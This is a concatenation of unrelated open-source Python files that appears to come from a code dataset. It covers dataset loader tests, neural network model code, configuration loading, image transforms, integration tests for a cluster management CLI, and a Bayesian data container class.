# self.test_nuts_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
#
class DirichletProcessMixturePredictTestCase(DirichletProcessMixtureTestCase):
# def test_predict_returns_predictions(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds = self.test_DPMM.predict(self.X_test)
# self.assertEqual(self.y_test.shape, preds.shape)
# def test_predict_returns_mean_predictions_and_std(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds, stds = self.test_DPMM.predict(self.X_test, return_std=True)
# self.assertEqual(self.y_test.shape, preds.shape)
# self.assertEqual(self.y_test.shape, stds.shape)
def test_predict_raises_error_if_not_fit(self):
print('')
with self.assertRaises(NotFittedError) as no_fit_error:
test_DPMM = DirichletProcessMixture()
test_DPMM.predict(self.X_train)
expected = 'Run fit on the model before predict.'
self.assertEqual(str(no_fit_error.exception), expected)
# class DirichletProcessMixtureScoreTestCase(DirichletProcessMixtureTestCase):
# def test_score_matches_sklearn_performance(self):
# print('')
# skDPMM = skBayesianGaussianMixture(n_components=3)
# skDPMM.fit(self.X_train)
# skDPMM_score = skDPMM.score(self.X_test)
#
# self.test_DPMM.fit(self.X_train)
# test_DPMM_score = self.test_DPMM.score(self.X_test)
#
# self.assertAlmostEqual(skDPMM_score, test_DPMM_score, 0)
#
#
# class DirichletProcessMixtureSaveAndLoadTestCase(DirichletProcessMixtureTestCase):
# def test_save_and_load_work_correctly(self):
# print('')
# self.test_DPMM.fit(self.X_train)
# score1 = self.test_DPMM.score(self.X_test)
# self.test_DPMM.save(self.test_dir)
#
# DPMM2 = DirichletProcessMixture()
# DPMM2.load(self.test_dir)
#
# self.assertEqual(self.test_DPMM.inference_type, DPMM2.inference_type)
# self.assertEqual(self.test_DPMM.num_pred, DPMM2.num_pred)
# self.assertEqual(self.test_DPMM.num_training_samples,
# DPMM2.num_training_samples)
# self.assertEqual(self.test_DPMM.num_truncate, DPMM2.num_truncate)
#
# pd.testing.assert_frame_equal(summary(self.test_DPMM.trace),
# summary(DPMM2.trace))
#
# score2 = DPMM2.score(self.X_test)
# self.assertAlmostEqual(score1, score2, 0)
|
utils/utils.py | cheng052/H3DNet | 212 | 22210 | <reponame>cheng052/H3DNet<gh_stars>100-1000
import torch
import torch.nn as nn
import torch.nn.functional as F
def conv3x3x3(in_planes, out_planes, stride):
# 3x3x3 convolution with padding
return nn.Conv3d(
in_planes,
out_planes,
kernel_size=3,
stride=stride,
padding=1)
def upconv3x3x3(in_planes, out_planes, stride):
return nn.ConvTranspose3d(
in_planes,
out_planes,
kernel_size=3,
stride=1,
padding=1,
output_padding=1)
def conv_block_3d(in_dim, out_dim, activation):
return nn.Sequential(
nn.Conv3d(in_dim, out_dim, kernel_size=3, stride=1, padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def conv_trans_block_3d(in_dim, out_dim, activation, stride=2):
return nn.Sequential(
nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=stride, padding=1, output_padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def max_pooling_3d():
return nn.MaxPool3d(kernel_size=2, stride=2, padding=0)
def conv_block_2_3d(in_dim, out_dim, activation, stride=1):
return nn.Sequential(
conv_block_3d(in_dim, out_dim, activation),
nn.Conv3d(out_dim, out_dim, kernel_size=3, stride=stride, padding=1),
nn.BatchNorm3d(out_dim),)
|
tests/datasets/test_tonas.py | lucaspbastos/mirdata | 224 | 22239 | import numpy as np
from tests.test_utils import run_track_tests
from mirdata import annotations
from mirdata.datasets import tonas
TEST_DATA_HOME = "tests/resources/mir_datasets/tonas"
def test_track():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
expected_attributes = {
"singer": "<NAME>",
"style": "Debla",
"title": "<NAME>",
"tuning_frequency": 451.0654725341684,
"f0_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.f0.Corrected",
"notes_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.notes.Corrected",
"audio_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.wav",
"track_id": "01-D_AMairena",
}
expected_property_types = {
"f0": annotations.F0Data,
"f0_automatic": annotations.F0Data,
"f0_corrected": annotations.F0Data,
"notes": annotations.NoteData,
"audio": tuple,
"singer": str,
"style": str,
"title": str,
"tuning_frequency": float,
}
run_track_tests(track, expected_attributes, expected_property_types)
def test_to_jams():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
jam = track.to_jams()
# Validate cante100 jam schema
assert jam.validate()
# Validate melody
f0 = jam.search(namespace="pitch_contour")[0]["data"]
assert [note.time for note in f0] == [0.197, 0.209, 0.221, 0.232]
assert [note.duration for note in f0] == [0.0, 0.0, 0.0, 0.0]
assert [note.value for note in f0] == [
{"index": 0, "frequency": 0.0, "voiced": False},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
]
print([note.confidence for note in f0])
assert [note.confidence for note in f0] == [3.09e-06, 2.86e-06, 7.15e-06, 1.545e-05]
# Validate note transciption
notes = jam.search(namespace="note_hz")[0]["data"]
assert [note.time for note in notes] == [
0.216667,
0.65,
2.183333,
2.566667,
]
assert [note.duration for note in notes] == [
0.433333,
1.016667,
0.3833329999999999,
0.3333330000000001,
]
assert [note.value for note in notes] == [
388.8382625732775,
411.9597888711769,
388.8382625732775,
411.9597888711769,
]
assert [note.confidence for note in notes] == [None, None, None, None]
def test_load_melody():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
f0_path = track.f0_path
f0_data_corrected = tonas.load_f0(f0_path, True)
f0_data_automatic = tonas.load_f0(f0_path, False)
# check types
assert type(f0_data_corrected) == annotations.F0Data
assert type(f0_data_corrected.times) is np.ndarray
assert type(f0_data_corrected.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_corrected._confidence) is np.ndarray
assert type(f0_data_automatic) == annotations.F0Data
assert type(f0_data_automatic.times) is np.ndarray
assert type(f0_data_automatic.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_automatic._confidence) is np.ndarray
# check values
assert np.array_equal(
f0_data_corrected.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_corrected.frequencies, np.array([0.000, 379.299, 379.299, 379.299])
)
assert np.array_equal(
f0_data_corrected.voicing,
np.array([0.0, 1.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_corrected._confidence,
np.array([3.090e-06, 0.00000286, 0.00000715, 0.00001545]),
)
# check values
assert np.array_equal(
f0_data_automatic.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_automatic.frequencies,
np.array(
[
0.000,
0.000,
143.918,
143.918,
]
),
)
assert np.array_equal(
f0_data_automatic.voicing,
np.array([0.0, 0.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_automatic._confidence,
np.array([3.090e-06, 2.860e-06, 0.00000715, 0.00001545]),
)
def test_load_notes():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
notes_path = track.notes_path
notes_data = tonas.load_notes(notes_path)
tuning_frequency = tonas._load_tuning_frequency(notes_path)
# check types
assert type(notes_data) == annotations.NoteData
assert type(notes_data.intervals) is np.ndarray
assert type(notes_data.pitches) is np.ndarray
assert type(notes_data.confidence) is np.ndarray
assert type(tuning_frequency) is float
# check tuning frequency
assert tuning_frequency == 451.0654725341684
# check values
assert np.array_equal(
notes_data.intervals[:, 0], np.array([0.216667, 0.65, 2.183333, 2.566667])
)
assert np.array_equal(
notes_data.intervals[:, 1], np.array([0.65, 1.666667, 2.566666, 2.9])
)
assert np.array_equal(
notes_data.pitches,
np.array(
[388.8382625732775, 411.9597888711769, 388.8382625732775, 411.9597888711769]
),
)
assert np.array_equal(
notes_data.confidence,
np.array(
[
0.018007,
0.010794,
0.00698,
0.03265,
]
),
)
def test_load_audio():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
audio_path = track.audio_path
audio, sr = tonas.load_audio(audio_path)
assert sr == 44100
assert type(audio) is np.ndarray
def test_metadata():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
metadata = dataset._metadata
assert metadata[default_trackid] == {
"title": "En el barrio de Triana",
"style": "Debla",
"singer": "<NAME>",
}
|
pyleus/configuration.py | earthmine/pyleus | 166 | 22245 | """Configuration defaults and loading functions.
Pyleus will look for configuration files in the following file paths in order
of increasing precedence. The latter configuration overrides the previous one.
#. /etc/pyleus.conf
#. ~/.config/pyleus.conf
#. ~/.pyleus.conf
You can always specify a configuration file when running any pyleus CLI command
as following:
``$ pyleus -c /path/to/config_file CMD``
This will override previous configurations.
Configuration file example
--------------------------
The following file contains all options you can configure for all pyleus
invocations.
.. code-block:: ini
[storm]
# path to Storm executable (pyleus will automatically look in PATH)
storm_cmd_path: /usr/share/storm/bin/storm
# optional: use -n option of pyleus CLI instead
nimbus_host: 10.11.12.13
# optional: use -p option of pyleus CLI instead
nimbus_port: 6628
# java options to pass to Storm CLI
jvm_opts: -Djava.io.tmpdir=/home/myuser/tmp
[build]
# PyPI server to use during the build of your topologies
pypi_index_url: http://pypi.ninjacorp.com/simple/
# always use system-site-packages for pyleus virtualenvs (default: false)
system_site_packages: true
# list of packages to always include in your topologies
include_packages: foo bar<4.0 baz==0.1
"""
from __future__ import absolute_import
import collections
import os
from pyleus import BASE_JAR_PATH
from pyleus.utils import expand_path
from pyleus.exception import ConfigurationError
from pyleus.compat import configparser
# Configuration files paths in order of increasing precedence
# Please keep in sync with module docstring
CONFIG_FILES_PATH = [
"/etc/pyleus.conf",
"~/.config/pyleus.conf",
"~/.pyleus.conf"
]
Configuration = collections.namedtuple(
"Configuration",
"base_jar config_file debug func include_packages output_jar \
pypi_index_url nimbus_host nimbus_port storm_cmd_path \
system_site_packages topology_path topology_jar topology_name verbose \
wait_time jvm_opts"
)
"""Namedtuple containing all pyleus configuration values."""
DEFAULTS = Configuration(
base_jar=BASE_JAR_PATH,
config_file=None,
debug=False,
func=None,
include_packages=None,
output_jar=None,
pypi_index_url=None,
nimbus_host=None,
nimbus_port=None,
storm_cmd_path=None,
system_site_packages=False,
topology_path="pyleus_topology.yaml",
topology_jar=None,
topology_name=None,
verbose=False,
wait_time=None,
jvm_opts=None,
)
def _validate_config_file(config_file):
"""Ensure that config_file exists and is a file."""
if not os.path.exists(config_file):
raise ConfigurationError("Specified configuration file not"
" found: {0}".format(config_file))
if not os.path.isfile(config_file):
raise ConfigurationError("Specified configuration file is not"
" a file: {0}".format(config_file))
def update_configuration(config, update_dict):
"""Update configuration with new values passed as dictionary.
:return: new configuration ``namedtuple``
"""
tmp = config._asdict()
tmp.update(update_dict)
return Configuration(**tmp)
def load_configuration(cmd_line_file):
"""Load configurations from the more generic to the
more specific configuration file. The latter configurations
override the previous one.
If a file is specified from command line, it is considered
the most specific.
:return: configuration ``namedtuple``
"""
config_files_hierarchy = [expand_path(c) for c in CONFIG_FILES_PATH]
if cmd_line_file is not None:
_validate_config_file(cmd_line_file)
config_files_hierarchy.append(cmd_line_file)
config = configparser.SafeConfigParser()
config.read(config_files_hierarchy)
configs = update_configuration(
DEFAULTS,
dict(
(config_name, config_value)
for section in config.sections()
for config_name, config_value in config.items(section)
)
)
return configs
|
pymic/transform/threshold.py | HiLab-git/PyMIC | 147 | 22249 | <reponame>HiLab-git/PyMIC
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import torch
import json
import math
import random
import numpy as np
from scipy import ndimage
from pymic.transform.abstract_transform import AbstractTransform
from pymic.util.image_process import *
class ChannelWiseThreshold(AbstractTransform):
"""Threshold the image (shape [C, D, H, W] or [C, H, W]) for each channel
"""
def __init__(self, params):
"""
channels (tuple/list/None): the list of specified channels for thresholding. Default value
is all the channels.
threshold_lower (tuple/list/None): The lower threshold values for specified channels.
threshold_upper (tuple/list/None): The uppoer threshold values for specified channels.
replace_lower (tuple/list/None): new values for pixels with intensity smaller than
threshold_lower. Default value is
replace_upper (tuple/list/None): new values for pixels with intensity larger than threshold_upper.
"""
super(ChannelWiseThreshold, self).__init__(params)
self.channlels = params['ChannelWiseThreshold_channels'.lower()]
self.threshold_lower = params['ChannelWiseThreshold_threshold_lower'.lower()]
self.threshold_upper = params['ChannelWiseThreshold_threshold_upper'.lower()]
self.replace_lower = params['ChannelWiseThreshold_replace_lower'.lower()]
self.replace_upper = params['ChannelWiseThreshold_replace_upper'.lower()]
self.inverse = params.get('ChannelWiseThreshold_inverse'.lower(), False)
def __call__(self, sample):
image= sample['image']
channels = range(image.shape[0]) if self.channlels is None else self.channlels
for i in range(len(channels)):
chn = channels[i]
if((self.threshold_lower is not None) and (self.threshold_lower[i] is not None)):
t_lower = self.threshold_lower[i]
r_lower = self.threshold_lower[i]
if((self.replace_lower is not None) and (self.replace_lower[i] is not None)):
r_lower = self.replace_lower[i]
image[chn][image[chn] < t_lower] = r_lower
if((self.threshold_upper is not None) and (self.threshold_upper[i] is not None)):
t_upper = self.threshold_upper[i]
r_upper = self.threshold_upper[i]
if((self.replace_upper is not None) and (self.replace_upper[i] is not None)):
r_upper= self.replace_upper[i]
image[chn][image[chn] > t_upper] = r_upper
sample['image'] = image
return sample
class ChannelWiseThresholdWithNormalize(AbstractTransform):
"""
Note that this can be replaced by ChannelWiseThreshold + NormalizeWithMinMax
Threshold the image (shape [C, D, H, W] or [C, H, W]) for each channel
and then normalize the image based on remaining pixels
"""
def __init__(self, params):
"""
:param threshold_lower: (tuple/list/None) The lower threshold value along each channel.
:param threshold_upper: (typle/list/None) The upper threshold value along each channel.
:param mean_std_mode: (bool) If true, nomalize the image based on mean and std values,
and pixels values outside the threshold value are replaced random number.
If false, use the min and max values for normalization.
"""
super(ChannelWiseThresholdWithNormalize, self).__init__(params)
self.threshold_lower = params['ChannelWiseThresholdWithNormalize_threshold_lower'.lower()]
self.threshold_upper = params['ChannelWiseThresholdWithNormalize_threshold_upper'.lower()]
self.mean_std_mode = params['ChannelWiseThresholdWithNormalize_mean_std_mode'.lower()]
self.inverse = params.get('ChannelWiseThresholdWithNormalize_inverse'.lower(), False)
def __call__(self, sample):
image= sample['image']
for chn in range(image.shape[0]):
v0 = self.threshold_lower[chn]
v1 = self.threshold_upper[chn]
if(self.mean_std_mode == True):
mask = np.ones_like(image[chn])
if(v0 is not None):
mask = mask * np.asarray(image[chn] > v0)
if(v1 is not None):
mask = mask * np.asarray(image[chn] < v1)
pixels = image[chn][mask > 0]
chn_mean = pixels.mean()
chn_std = pixels.std()
chn_norm = (image[chn] - chn_mean)/chn_std
chn_random = np.random.normal(0, 1, size = chn_norm.shape)
chn_norm[mask == 0] = chn_random[mask == 0]
image[chn] = chn_norm
else:
img_chn = image[chn]
if(v0 is not None):
img_chn[img_chn < v0] = v0
min_value = v0
else:
min_value = img_chn.min()
if(v1 is not None):
img_chn[img_chn > v1] = v1
max_value = img_chn.max()
else:
max_value = img_chn.max()
img_chn = (img_chn - min_value) / (max_value - min_value)
image[chn] = img_chn
sample['image'] = image
return sample |
reconstruction_model.py | JungahYang/Deep3DFaceReconstruction | 1,424 | 22261 | <gh_stars>1000+
import tensorflow as tf
import face_decoder
import networks
import losses
from utils import *
###############################################################################################
# model for single image face reconstruction
###############################################################################################
class Reconstruction_model():
# initialization
def __init__(self,opt):
self.Face3D = face_decoder.Face3D() #analytic 3D face object
self.opt = opt # training options
self.Optimizer = tf.train.AdamOptimizer(learning_rate = opt.lr) # optimizer
# load input data from queue
def set_input(self,input_iterator):
self.imgs,self.lm_labels,self.attention_masks = input_iterator.get_next()
# forward process of the model
def forward(self,is_train = True):
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
self.coeff = networks.R_Net(self.imgs,is_training=is_train)
self.Face3D.Reconstruction_Block(self.coeff,self.opt)
self.id_labels = networks.Perceptual_Net(self.imgs)
self.id_features = networks.Perceptual_Net(self.Face3D.render_imgs)
self.photo_loss = losses.Photo_loss(self.imgs,self.Face3D.render_imgs,self.Face3D.img_mask_crop*self.attention_masks)
self.landmark_loss = losses.Landmark_loss(self.Face3D.landmark_p,self.lm_labels)
self.perceptual_loss = losses.Perceptual_loss(self.id_features,self.id_labels)
self.reg_loss = losses.Regulation_loss(self.Face3D.id_coeff,self.Face3D.ex_coeff,self.Face3D.tex_coeff,self.opt)
self.reflect_loss = losses.Reflectance_loss(self.Face3D.face_texture,self.Face3D.facemodel)
self.gamma_loss = losses.Gamma_loss(self.Face3D.gamma)
self.loss = self.opt.w_photo*self.photo_loss + self.opt.w_lm*self.landmark_loss + self.opt.w_id*self.perceptual_loss\
+ self.opt.w_reg*self.reg_loss + self.opt.w_ref*self.reflect_loss + self.opt.w_gamma*self.gamma_loss
# backward process
def backward(self,is_train = True):
if is_train:
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
var_list = tf.trainable_variables()
update_var_list = [v for v in var_list if 'resnet_v1_50' in v.name or 'fc-' in v.name]
grads = tf.gradients(self.loss,update_var_list)
# get train_op with update_ops to ensure updating for bn parameters
with tf.control_dependencies(update_ops):
self.train_op = self.Optimizer.apply_gradients(zip(grads,update_var_list),global_step = self.opt.global_step)
# if not training stage, avoid updating variables
else:
pass
# forward and backward
def step(self, is_train = True):
with tf.variable_scope(tf.get_variable_scope()) as scope:
self.forward(is_train = is_train)
self.backward(is_train = is_train)
# statistics summarization
def summarize(self):
# scalar and histogram stats
stat = [
tf.summary.scalar('reflect_error',self.reflect_loss),
tf.summary.scalar('gamma_error',self.gamma_loss),
tf.summary.scalar('id_sim_error',self.perceptual_loss),
tf.summary.scalar('lm_error',tf.sqrt(self.landmark_loss)),
tf.summary.scalar('photo_error',self.photo_loss),
tf.summary.scalar('train_error',self.loss),
tf.summary.histogram('id_coeff',self.Face3D.id_coeff),
tf.summary.histogram('ex_coeff',self.Face3D.ex_coeff),
tf.summary.histogram('tex_coeff',self.Face3D.tex_coeff)]
self.summary_stat = tf.summary.merge(stat)
# combine face region of reconstruction images with input images
render_imgs = self.Face3D.render_imgs[:,:,:,::-1]*self.Face3D.img_mask + tf.cast(self.imgs[:,:,:,::-1],tf.float32)*(1-self.Face3D.img_mask)
render_imgs = tf.clip_by_value(render_imgs,0,255)
render_imgs = tf.cast(render_imgs,tf.uint8)
# image stats
img_stat = [tf.summary.image('imgs',tf.concat([tf.cast(self.imgs[:,:,:,::-1],tf.uint8),render_imgs],axis = 2), max_outputs = 8)]
self.summary_img = tf.summary.merge(img_stat) |
integration_tests/test_test_oracle_tax.py | weblucas/mseg-semantic | 391 | 22266 | <reponame>weblucas/mseg-semantic
#!/usr/bin/python3
from pathlib import Path
from types import SimpleNamespace
from mseg_semantic.scripts.collect_results import parse_result_file
from mseg_semantic.tool.test_oracle_tax import test_oracle_taxonomy_model
REPO_ROOT_ = Path(__file__).resolve().parent.parent
# Replace this variables with your own path to run integration tests.
INTEGRATION_TEST_OUTPUT_DIR = '/srv/scratch/jlambert30/MSeg/mseg-semantic/integration_test_data'
# Copy the mseg-3m-1080p model there
CAMVID_MODEL_PATH = f'{INTEGRATION_TEST_OUTPUT_DIR}/camvid-11-1m.pth'
def test_evaluate_oracle_tax_model():
"""
Ensure oracle model testing script works correctly.
base_sizes=(
#360
720
#1080
python -u mseg_semantic/tool/test_oracle_tax.py --config=${config_fpath}
dataset ${dataset_name} model_path ${model_fpath} model_name ${model_name}
"""
base_size = 1080
d = {
'dataset': 'camvid-11',
'config': f'{REPO_ROOT_}/mseg_semantic/config/test/default_config_${base_size}_ss.yaml',
'model_path': CAMVID_MODEL_PATH,
'model_name': 'mseg-3m-1080p',
'input_file': 'default',
'base_size': base_size,
'test_h': 713,
'test_w': 713,
'scales': [1.0],
'save_folder': 'default',
'arch': 'hrnet',
'index_start': 0,
'index_step': 0,
'workers': 16,
'has_prediction': False,
'split': 'val',
'vis_freq': 20
}
args = SimpleNamespace(**d)
use_gpu = True
test_oracle_taxonomy_model(args, use_gpu)
# Ensure that results match paper
result_file_path = INTEGRATION_TEST_OUTPUT_DIR
result_file_path += f'/camvid-11-1m/camvid-11/{base_size}/ss/results.txt'
assert Path(result_file_path).exists()
mIoU = parse_result_file(result_file_path)
print(f"mIoU: {mIoU}")
# single-scale result
assert mIoU == 78.79
OKGREEN = '\033[92m'
ENDC = '\033[0m'
print(OKGREEN + ">>>>>>>>>>>>>>>>>>>>>>>>>>>>" + ENDC)
print(OKGREEN + 'Oracle model evalution passed successfully' + ENDC)
print(OKGREEN + ">>>>>>>>>>>>>>>>>>>>>>>>>>>>" + ENDC)
if __name__ == '__main__':
test_evaluate_oracle_tax_model()
|
docs/OOPS/Accessing_pvt_var2.py | munyumunyu/Python-for-beginners | 158 | 22270 | '''
To have a error free way of accessing and updating private variables, we create specific methods for this.
Those methods which are meant to set a value to a private variable are called setter methods and methods
meant to access private variable values are called getter methods.
The below code is an example of getter and setter methods:
'''
class Customer:
def __init__(self, id, name, age, wallet_balance):
self.id = id
self.name = name
self.age = age
self.__wallet_balance = wallet_balance
def set_wallet_balance(self, amount):
if amount < 1000 and amount> 0:
self.__wallet_balance = amount
def get_wallet_balance(self):
return self.__wallet_balance
c1=Customer(100, "Gopal", 24, 1000)
c1.set_wallet_balance(120)
print(c1.get_wallet_balance())
|
test-framework/test-suites/integration/tests/list/test_list_repo.py | sammeidinger/stack | 123 | 22272 | import json
class TestListRepo:
def test_invalid(self, host):
result = host.run('stack list repo test')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_args(self, host, add_repo):
# Add a second repo so we can make sure it is skipped
add_repo('test2', 'test2url')
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
# now get all of them
# assert both repos are in the list data
result = host.run('stack list repo output-format=json')
repo_data = json.loads(result.stdout)
assert len(repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in repo_data}
# now get all of them, by explicitly asking for them
# assert both repos are in the list data
result = host.run('stack list repo test test2 output-format=json')
new_repo_data = json.loads(result.stdout)
assert len(new_repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in new_repo_data}
def test_removed_not_listed(self, host, add_repo, revert_etc):
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
result = host.run('stack remove repo test')
assert result.rc == 0
# Run list repo again
result = host.run('stack list repo test output-format=json')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_expanded_columns(self, host, host_os, add_repo):
# Run list repo with just the test box
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": None
}
]
def test_add_repo_with_pallet(self, host, host_os, add_repo, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks, revert_etc):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
#result = host.run(f'stack add pallet /root/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
pallet_data = json.loads(result.stdout)
assert len(pallet_data) == 1
# get pallet id, as well as the -'d name in the correct order
from stack.commands import DatabaseConnection, get_mysql_connection, Command
from stack.argument_processors.pallet import PalletArgProcessor
from operator import attrgetter
p = PalletArgProcessor()
p.db = DatabaseConnection(get_mysql_connection())
minimal_pallet = p.get_pallets(args=['minimal'], params=pallet_data[0])[0]
pallet_name = '-'.join(attrgetter('name', 'version', 'rel', 'os', 'arch')(minimal_pallet))
# now attach the test repo to the pallet
result = host.run(f'stack set repo test pallet={minimal_pallet.id}')
assert result.rc == 0
# now verify it is attached to that pallet
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": pallet_name
}
]
# now verify that removing that pallet removes the repo as well
result = host.run('stack remove pallet minimal')
assert result.rc == 0
result = host.run('stack list repo')
assert result.rc == 0
assert result.stdout == ''
|
src/ralph/api/__init__.py | DoNnMyTh/ralph | 1,668 | 22300 | from ralph.api.serializers import RalphAPISerializer
from ralph.api.viewsets import RalphAPIViewSet, RalphReadOnlyAPIViewSet
from ralph.api.routers import router
__all__ = [
'RalphAPISerializer',
'RalphAPIViewSet',
'RalphReadOnlyAPIViewSet',
'router',
]
|
bnpy/data/GroupXData.py | raphael-group/bnpy | 184 | 22307 | <reponame>raphael-group/bnpy<filename>bnpy/data/GroupXData.py
'''
Classes
-----
GroupXData
Data object for holding a dense matrix X of real 64-bit floats,
organized contiguously based on provided group structure.
'''
import numpy as np
from collections import namedtuple
from bnpy.data.XData import XData
from bnpy.util import as1D, as2D, as3D, toCArray
from bnpy.util import numpyToSharedMemArray, sharedMemToNumpyArray
class GroupXData(XData):
""" Dataset object for dense real vectors organized in groups.
GroupXData can represent situations like:
* obseved image patches, across many images
group=image, observation=patch
* observed test results for patients, across many hospitals
group=hospital, obsevation=patient test result
Attributes
------
X : 2D array, size N x D
each row is a single dense observation vector
Xprev : 2D array, size N x D, optional
"previous" observations for auto-regressive likelihoods
dim : int
the dimension of each observation
nObs : int
the number of in-memory observations for this instance
TrueParams : dict
key/value pairs represent names and arrays of true parameters
doc_range : 1D array, size nDoc+1
the number of in-memory observations for this instance
nDoc : int
the number of in-memory documents for this instance
nDocTotal : int
total number of documents in entire dataset
Example
--------
# Create 1000 observations, each one a 3D vector
>>> X = np.random.randn(1000, 3)
# Assign items 0-499 to doc 1, 500-1000 to doc 2
>>> doc_range = [0, 500, 1000]
>>> myData = GroupXData(X, doc_range)
>>> print (myData.nObs)
1000
>>> print (myData.X.shape)
(1000, 3)
>>> print (myData.nDoc)
2
"""
@classmethod
def LoadFromFile(cls, filepath, nDocTotal=None, **kwargs):
''' Constructor for loading data from disk into XData instance
'''
if filepath.endswith('.mat'):
return cls.read_mat(filepath, nDocTotal=nDocTotal, **kwargs)
raise NotImplemented('Only .mat file supported.')
def save_to_mat(self, matfilepath):
''' Save contents of current object to disk
'''
import scipy.io
SaveVars = dict(X=self.X, nDoc=self.nDoc, doc_range=self.doc_range)
if hasattr(self, 'Xprev'):
SaveVars['Xprev'] = self.Xprev
if hasattr(self, 'TrueParams') and 'Z' in self.TrueParams:
SaveVars['TrueZ'] = self.TrueParams['Z']
scipy.io.savemat(matfilepath, SaveVars, oned_as='row')
@classmethod
def read_npz(cls, npzfilepath, nDocTotal=None, **kwargs):
''' Constructor for building an instance of GroupXData from npz
'''
var_dict = dict(**np.load(npzfilepath, allow_pickle=True))
if 'X' not in var_dict:
raise KeyError(
'Stored npz file needs to have data in field named X')
if 'doc_range' not in var_dict:
raise KeyError(
'Stored npz file needs to have field named doc_range')
if nDocTotal is not None:
var_dict['nDocTotal'] = nDocTotal
return cls(**var_dict)
@classmethod
def read_mat(cls, matfilepath, nDocTotal=None, **kwargs):
''' Constructor for building an instance of GroupXData from disk
'''
import scipy.io
InDict = scipy.io.loadmat(matfilepath)
if 'X' not in InDict:
raise KeyError(
'Stored matfile needs to have data in field named X')
if 'doc_range' not in InDict:
raise KeyError(
'Stored matfile needs to have field named doc_range')
if nDocTotal is not None:
InDict['nDocTotal'] = nDocTotal
return cls(**InDict)
def __init__(self, X=None, doc_range=None, nDocTotal=None,
Xprev=None, TrueZ=None,
TrueParams=None, fileNames=None, summary=None, **kwargs):
''' Create an instance of GroupXData for provided array X
Post Condition
---------
self.X : 2D array, size N x D
with standardized dtype, alignment, byteorder.
self.Xprev : 2D array, size N x D
with standardized dtype, alignment, byteorder.
self.doc_range : 1D array, size nDoc+1
'''
self.X = as2D(toCArray(X, dtype=np.float64))
self.doc_range = as1D(toCArray(doc_range, dtype=np.int32))
if summary is not None:
self.summary = summary
if Xprev is not None:
self.Xprev = as2D(toCArray(Xprev, dtype=np.float64))
# Verify attributes are consistent
self._set_dependent_params(doc_range, nDocTotal)
self._check_dims()
# Add optional true parameters / true hard labels
if TrueParams is not None:
self.TrueParams = dict()
for key, arr in list(TrueParams.items()):
self.TrueParams[key] = toCArray(arr)
if TrueZ is not None:
if not hasattr(self, 'TrueParams'):
self.TrueParams = dict()
self.TrueParams['Z'] = as1D(toCArray(TrueZ))
self.TrueParams['K'] = np.unique(self.TrueParams['Z']).size
# Add optional source files for each group/sequence
if fileNames is not None:
if hasattr(fileNames, 'shape') and fileNames.shape == (1, 1):
fileNames = fileNames[0, 0]
if len(fileNames) > 1:
self.fileNames = [str(x).strip()
for x in np.squeeze(fileNames)]
else:
self.fileNames = [str(fileNames[0])]
# Add extra data attributes custom for the dataset
for key in kwargs:
if hasattr(self, key):
continue
if not key.startswith("__"):
arr = np.squeeze(as1D(kwargs[key]))
if arr.shape == ():
try:
arr = float(arr)
except TypeError:
continue
setattr(self, key, arr)
